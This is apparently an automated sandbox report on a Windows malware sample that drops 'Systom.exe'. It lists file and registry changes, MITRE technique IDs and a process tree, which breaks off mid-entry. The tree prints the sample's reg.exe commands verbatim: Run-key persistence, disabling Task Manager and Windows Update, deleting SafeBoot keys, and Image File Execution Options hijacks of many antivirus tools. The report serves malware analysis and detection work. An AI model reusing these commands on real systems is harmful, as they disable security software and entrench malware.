File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_en-us_b87da52fa7e9b700\404-14.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_es-es_b8490213a810a8a5\403-18.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_de-de_0f8ccf36b90bab3b\404-15.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_de-de_0f8ccf36b90bab3b\500-19.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_en-us_b87da52fa7e9b700\500-19.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_5b0078129ae2bf07\403-14.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_5b0078129ae2bf07\401-5.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_it-it_45286e597214a485\405.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_e74ded66652fb660\403-16.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_e74ded66652fb660\403-9.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_e74ded66652fb660\404-6.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_en-us_b87da52fa7e9b700\500-16.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_es-es_b8490213a810a8a5\403-12.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_it-it_45286e597214a485\404-10.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_5b0078129ae2bf07\500-13.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_de-de_0f8ccf36b90bab3b\401-3.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_en-us_b87da52fa7e9b700\401-2.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_es-es_b8490213a810a8a5\401-5.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_es-es_b8490213a810a8a5\403-1.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_es-es_b8490213a810a8a5\404-12.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_5b0078129ae2bf07\401-2.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_e74ded66652fb660\403-5.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-mail-app_31bf3856ad364e35_6.1.7601.17514_none_4f7e32f76654bd3c\Shades of Blue.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_de-de_0f8ccf36b90bab3b\403-11.htm	Systom.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a924f45055964447945ab7d0e47c411100000000020000000000106600000001000020000000c5cda6e020a350b9b8a21e030fa571790b71b03e5dda6666c48b767e96ae0c41000000000e800000000200002000000047bfe0474354371d1b725665e66503b04e9b4cacd2bcc5505cf9ac85e40a7bf790000000fa52f4723ad4c0bff3b05c3224a8b02ad9176a1ddf4e7eadb048fc44df0a0011c3b4fa25ce2c2f4b807087211a7275bfebfe5a1e9387337167d0a4f89106364f1c5ae98865c10271fa9f2a04dbe4cebca9c8e2d1a5af31e86b9b4a80da6e192386285cc282c262604041fc8e20bba1dea294d1bbcaf138dcf7a6fdb2cf3ec79139c5dafd2385ef3c2d020a5171cac15840000000cff2983a8444dcf1a184775bf193c680b14a1cf6376c2ddd6c272c4635d231ecdbefca834635e308273edb3d4695a86bb452c0560191e3f78af1c8273a74f249	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a06817419557bf01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a924f45055964447945ab7d0e47c4111000000000200000000001066000000010000200000006f5263a125bbde0815dc0897de9e90b0fb25b9f4294e5397aed0b06c9f6bccb4000000000e8000000002000020000000ae7f6793822ab8fa21f6b419550a1986418549ab7d918a7d4c4165399cfedb8720000000d260db4136af4a354f82686c732aebddca647a230420423bad3d42d90973ed7e400000003bab89f8d09f4f8c0cc50cb61d000219ee3c14c461fe54644c6440236a3ae960ac29d5ed1343cc91db4b9a9ccbad0affafc98137a066f3e933c22f95d18038b2	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "1786687803"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3427588347-1492276948-3422228430-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe

Modifies registry key 1 TTPs 9 IoCs

Modify Registry

T1112

pid	Process
2596	reg.exe
2844	reg.exe
2772	reg.exe
2724	reg.exe
2312	reg.exe
2816	reg.exe
2832	reg.exe
2732	reg.exe
2992	reg.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3056	Systom.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeSystemtimePrivilege	3056	Systom.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2396	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2396	iexplore.exe
2396	iexplore.exe
1376	IEXPLORE.EXE
1376	IEXPLORE.EXE
1376	IEXPLORE.EXE
1376	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3036 wrote to memory of 3056	3036	29aee1ebc452c57d9bfaee973ae89873.exe	28
PID 3036 wrote to memory of 3056	3036	29aee1ebc452c57d9bfaee973ae89873.exe	28
PID 3036 wrote to memory of 3056	3036	29aee1ebc452c57d9bfaee973ae89873.exe	28
PID 3036 wrote to memory of 3056	3036	29aee1ebc452c57d9bfaee973ae89873.exe	28
PID 3056 wrote to memory of 2312	3056	Systom.exe	29
PID 3056 wrote to memory of 2312	3056	Systom.exe	29
PID 3056 wrote to memory of 2312	3056	Systom.exe	29
PID 3056 wrote to memory of 2312	3056	Systom.exe	29
PID 3056 wrote to memory of 2152	3056	Systom.exe	31
PID 3056 wrote to memory of 2152	3056	Systom.exe	31
PID 3056 wrote to memory of 2152	3056	Systom.exe	31
PID 3056 wrote to memory of 2152	3056	Systom.exe	31
PID 3056 wrote to memory of 2700	3056	Systom.exe	162
PID 3056 wrote to memory of 2700	3056	Systom.exe	162
PID 3056 wrote to memory of 2700	3056	Systom.exe	162
PID 3056 wrote to memory of 2700	3056	Systom.exe	162
PID 3056 wrote to memory of 2816	3056	Systom.exe	164
PID 3056 wrote to memory of 2816	3056	Systom.exe	164
PID 3056 wrote to memory of 2816	3056	Systom.exe	164
PID 3056 wrote to memory of 2816	3056	Systom.exe	164
PID 3056 wrote to memory of 2724	3056	Systom.exe	169
PID 3056 wrote to memory of 2724	3056	Systom.exe	169
PID 3056 wrote to memory of 2724	3056	Systom.exe	169
PID 3056 wrote to memory of 2724	3056	Systom.exe	169
PID 3056 wrote to memory of 2992	3056	Systom.exe	165
PID 3056 wrote to memory of 2992	3056	Systom.exe	165
PID 3056 wrote to memory of 2992	3056	Systom.exe	165
PID 3056 wrote to memory of 2992	3056	Systom.exe	165
PID 3056 wrote to memory of 2732	3056	Systom.exe	39
PID 3056 wrote to memory of 2732	3056	Systom.exe	39
PID 3056 wrote to memory of 2732	3056	Systom.exe	39
PID 3056 wrote to memory of 2732	3056	Systom.exe	39
PID 3056 wrote to memory of 2832	3056	Systom.exe	37
PID 3056 wrote to memory of 2832	3056	Systom.exe	37
PID 3056 wrote to memory of 2832	3056	Systom.exe	37
PID 3056 wrote to memory of 2832	3056	Systom.exe	37
PID 3056 wrote to memory of 2596	3056	Systom.exe	41
PID 3056 wrote to memory of 2596	3056	Systom.exe	41
PID 3056 wrote to memory of 2596	3056	Systom.exe	41
PID 3056 wrote to memory of 2596	3056	Systom.exe	41
PID 3056 wrote to memory of 2772	3056	Systom.exe	46
PID 3056 wrote to memory of 2772	3056	Systom.exe	46
PID 3056 wrote to memory of 2772	3056	Systom.exe	46
PID 3056 wrote to memory of 2772	3056	Systom.exe	46
PID 3056 wrote to memory of 2844	3056	Systom.exe	43
PID 3056 wrote to memory of 2844	3056	Systom.exe	43
PID 3056 wrote to memory of 2844	3056	Systom.exe	43
PID 3056 wrote to memory of 2844	3056	Systom.exe	43
PID 3056 wrote to memory of 2056	3056	Systom.exe	54
PID 3056 wrote to memory of 2056	3056	Systom.exe	54
PID 3056 wrote to memory of 2056	3056	Systom.exe	54
PID 3056 wrote to memory of 2056	3056	Systom.exe	54
PID 3056 wrote to memory of 2052	3056	Systom.exe	180
PID 3056 wrote to memory of 2052	3056	Systom.exe	180
PID 3056 wrote to memory of 2052	3056	Systom.exe	180
PID 3056 wrote to memory of 2052	3056	Systom.exe	180
PID 3056 wrote to memory of 1200	3056	Systom.exe	55
PID 3056 wrote to memory of 1200	3056	Systom.exe	55
PID 3056 wrote to memory of 1200	3056	Systom.exe	55
PID 3056 wrote to memory of 1200	3056	Systom.exe	55
PID 3056 wrote to memory of 1480	3056	Systom.exe	56
PID 3056 wrote to memory of 1480	3056	Systom.exe	56
PID 3056 wrote to memory of 1480	3056	Systom.exe	56
PID 3056 wrote to memory of 1480	3056	Systom.exe	56

C:\Users\Admin\AppData\Local\Temp\29aee1ebc452c57d9bfaee973ae89873.exe
"C:\Users\Admin\AppData\Local\Temp\29aee1ebc452c57d9bfaee973ae89873.exe"
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3036
- C:\Windows\SysWOW64\Systom.exe
  C:\Windows\system32\Systom.exe
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - Drops autorun.inf file
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V crsss /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:2312
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate /v DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f
    3⤵
    PID:2152
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_dword /d 00000001 /f
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_SZ /d 0 /f
    3⤵
    - Modifies registry key
    PID:2816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
    3⤵
    - Modifies registry key
    PID:2832
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v CheckedValue /t REG_dword /d 00000002 /f
    3⤵
    - Modifies registry key
    PID:2732
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
    3⤵
    - Modifies registry key
    PID:2596
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
    3⤵
    - Modifies registry key
    PID:2844
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /f
    3⤵
    - Modifies registry key
    PID:2772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v Text /t REG_SZ /d ÏÔÊ¾ËùÓÐÎÄ¼þºÍÎÄ¼þ¼Ð /f
    3⤵
    - Modifies registry key
    PID:2992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /f
    3⤵
    - Modifies registry key
    PID:2724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:1200
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:1468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AST.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2748
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2920
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AutoRuns.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:844
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:1968
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:1996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2272
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    - Sets file execution options in registry
    PID:1964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShell.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe" /V Debugger /T REG_SZ /D C:\Windows\system32\Systom.exe /F
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\reg.exe
